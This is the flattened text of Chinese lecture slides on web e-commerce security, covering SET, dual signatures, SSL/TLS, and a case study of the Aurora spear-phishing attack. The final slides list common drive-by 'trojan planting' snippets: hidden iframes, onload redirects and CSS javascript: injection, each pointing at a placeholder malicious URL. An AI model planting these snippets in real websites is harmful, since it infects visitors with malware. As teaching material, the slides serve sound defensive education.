第12章Web电子商务安全

Web电子商务安全第十二章主讲人：任凯联系方式：renkai_jlxy@163.com百度云盘：/s/1qWykdjQ1第十二章WEB电子商务安全12.1电子商务概述12.2安全电子商务的体系结构12.3安全电子交易SET12.4安全套接字层SSL12.5数字现金协议12.6网上银行2B2C是从企业到终端客户（包括个人消费者和组织消费者）的业务模式。

B2B是企业与企业之间的业务模式。电子商务模式3（1）冒名偷窥。（2）篡改数据。（3）信息丢失。（4）信息传递过程中的破坏。

12.1.2电子商务的安全4Internet12.2安全电子商务的体系结构

网络平台电子商务基础平台电子商务应用系统CA认证中心、支付网关、客户服务中心

网上投标

网上订票

网上交费

网上银行

网上超市

远程医疗5背景：VISA与MASTERCARD两大信用卡国际组织共同发起制定保障在因特网上进行安全电子交易的SET(SecureElectronicTransaction)协议由众多信息产业公司，如Microsoft、Netscape、RSA等共同协作发展而成用途：围绕客户、商家等交易各方相互之间身份的确认，采用了电子证书等技术，以保障交易安全12.3安全电子交易SET

612.3.1SET协议概述SET协议主要内容加密算法（RSA和DES）的应用证书消息和对象格式购买消息和对象格式付款消息和对象格式参与者之间的消息协议712.3.1SET协议概述SET支付系统中的相关成员：

81.SET协议消息传输过程SET协议消息发送过程:

数字信封：将对称密钥通过非对称公钥加密的结果分发对称密钥的方法12.3.2SET协议工作原理91.SET协议消息传输过程

SET协议消息接收过程：12.3.2SET协议工作原理10(1)消费者互联网购买的物品并形成订货单。订货单上需包括在线商店、购买物品名称及数量、交货时间及地点等相关信息(2)消费者选择付款方式、确认订单、签发付款指令。SET开始介入(3)在SET中，消费者必须对订单和付款指令进行数字签名，同时利用双重签名技术保证商家看不到消费者的账号信息(4)在线商店接受订单后，向消费者所在银行请求支付认可。信息通过支付网关到持卡人的发卡银行请求支付认可。批准交易后，返回确认信息给电商(5)电商发送订单确认信息给消费者(6)电商发送货物或提供服务，支付网关通知发卡银行请求支付(7)消费者确认收货后，支付网关支付给收款银行2.SET协议流程

12.3.2SET协议工作原理113.双重签名产生背景：消费者不想让银行看到订单细节，同时也不想让商家看到银行支付信息

例如消息A是订单信息，消息B是支付信息，或者互换一下12.3.2SET协议工作原理123.双重签名消息的验证例如消息A是订单信息，消息B是支付信息12.3.1SET协议工作原理13Netscape公司开发的一个网络安全协议已成为事实上的安全网上交易标准协议三个版本：SSL1.0SSL2.0SSL3.0IETF发布了TLS(TransportLayerSecurity),TLS1.0

通常被称作SSL3.1TLS1.1TLS1.2SSL与SET最大不同在于SSL是一个双方协议，仅提供通信双方的安全保证，而SET协议则提供通信多方的安全保证SSL比SET简单得多，目前在Web服务中已广泛使用

12.4安全套接字层SSL(SecureSocketsLayer，SSL）1412.4.1SSL概述SSL功能：客户认证服务器身份服务器认证客户身份客户与服务器自动协商生成密钥加密客户与服务器间的数据，并可抵御重放攻击检测客户与服务器间数据的完整性151.SSL协议体系结构SSL仅被广泛用于HTTP连接SSL位于TCP和应用层协议(如HTTP)之间理论上，SSL可以运行于任何TCP/IP应用程序之上，而不用对其做任何修改12.4.2SSL工作原理16SSL记录协议在客户机和服务器之间传输应用数据和SSL控制数据2.SSL记录协议12.4.2SSL工作原理172.SSL记录协议SSL记录协议报文格式：

12.4.2SSL工作原理18NetworkandInformationSecurity12.4.2SSL工作原理3.SSL改变密码规范协议和告警协议195.SSL握手协议：该协议允许客户和服务器相互验证、协商加密和MAC算法以及密钥，用来保护SSL记录发送的数据。12.4.2SSL工作原理20网络钓鱼流程图2112.6网上银行网络钓鱼(SpearPhishing)极光行动（Aurora）2009年12月中旬可能源自中国“精心策划且目标明确”的一场网络攻击，其名称“Aurora”（意为极光、欧若拉）来自攻击者电脑上恶意文件所在路径的一部分。遭受攻击的除了Google外，还有20多家公司：其中包括AdobeSystems、JuniperNetworks、Rackspace、雅虎、赛门铁克、诺斯洛普·格鲁门和陶氏化工Google表示有部分知识产权遭到盗窃。它认为，黑客的主要兴趣在于访问中国持不同政见者的Gmail帐户美国国务卿希拉里·克林顿发表了一则简短声明谴责此次攻击事件，并要求中国作出回应[12]。中国政府当时并未做出正式回应美国国会计划对Google的指控进行调查，后者指控中国政府利用计算机服务监视人权活动人士2212.6网上银行网络钓鱼(SpearPhishing)极光行动（Aurora）攻击过程回放：搜集Google员工在Facebook、Twitter等社交网站上发布的信息；利用动态DNS供应商建立托管伪造照片网站的Web服务器，Google员工收到来自信任的人发来的网络链接并且点击，含有shellcode的JavaScript造成IE浏览器溢出，远程下载并运行程序；通过SSL安全隧道与受害人机器建立连接，持续监听并最终获得该雇员访问Google服务器的帐号密码等信息；使用该雇员的凭证成功渗透进入Google邮件服务器，进而不断获取特定Gmail账户的邮件内容信息2312.6网上银行网络钓鱼(SpearPhishing)极光行动（Aurora）从用户单击钓鱼邮件那一刻开始讲起1.三次握手建立连接2.攻击者的机器收到一个GET请求3.数据包6返回了一个302码（重定向页面）4.从Details面板中可以看到一个Location域，它指明重定向位置是/info?rFfWELUjLJHpP在第9包上右击“FollowTCPStream”2412.6网上银行病毒2512.6网上银行2612.6网上银行根据显示的内容找到25包2712.6网上银行已经获得了无限制的管理权限2812.6网上银行一些常用的挂马方式框架挂马<iframesrc="网马地址"width=0height=0></iframe>body挂马<bodyonload="window.location='网马地址';"></body>java挂马<scriptlanguage=javascript>window.open("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>js文件挂马将代码“document.write("<iframewidth=0height=0src='网马地址'></iframe>");”保存为muma.js文件，则js文件挂马代码为“<scriptlanguage=javascriptsrc=muma.js></script>”2912.6网上银行一些常用的挂马方式：css中挂马body{background-image:url('javascript:document.write("<scriptsrc=/muma.js></script>")')}高级欺骗<ahref=(迷惑连接地址)onMouseOver="muma();r